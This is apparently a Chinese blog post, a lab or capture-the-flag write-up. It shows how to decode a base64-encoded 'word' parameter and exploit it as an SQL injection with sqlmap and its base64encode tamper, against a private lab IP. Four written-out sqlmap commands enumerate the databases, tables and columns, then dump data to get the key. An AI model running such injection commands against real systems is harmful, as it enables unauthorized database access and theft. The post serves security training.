zoukankan      html  css  js  c++  java
  • 黑阔主流攻防之加密与解密的对抗二

    第二个虚拟机打开是这样的,

    点击order by ranking,发现有一个word参数,参数后面的我们很容易可以看出是base64加密,

    这里解密来一波,

    很明显是sql查询语句,于是博主直接扔sqlmap跑去了,

    检测到word参数有注入点,但是传入的参数都是base64处理过的,于是我们直接导入sqlmap中那个的tamper,base64encode这个模块

    检测数据库

    1 python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode   --level 5
    View Code

    跑出来四个数据库

    有一个数据库与其他数据库格格不入,很明显second就是我们的目标了

    下一步,检测数据表

    1  python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode   --level 5 -D second --tables
    View Code

    跑出来一个language表

    下一步,检测表下面的列名,有三个列名

    1  python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode   --level 5 -D second -T language --columns
    View Code

    下一步,根据列名dump出有效信息

    1  python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode   --level 5 -D second -T language -C year,language,ranking --dump
    View Code

    ok,成功拿到Key

  • 相关阅读:
    Charles的基本功能使用
    模拟器的代理功能
    LoadRunner参数包含逗号
    MySQL 与 [charlist]% 通配符
    MySQL 删除重复项并保留其中一个
    Selenium grid 分布式测试搭建(二)
    Selenium grid 分布式测试搭建(一)
    chromedriver与chrome版本映射表 与chromedriver 下载地址
    Selenium 打开 Chrome 链接框只有 Data;
    Xpath 小结
  • 原文地址:https://www.cnblogs.com/mke2fs/p/10651012.html
Copyright © 2011-2022 走看看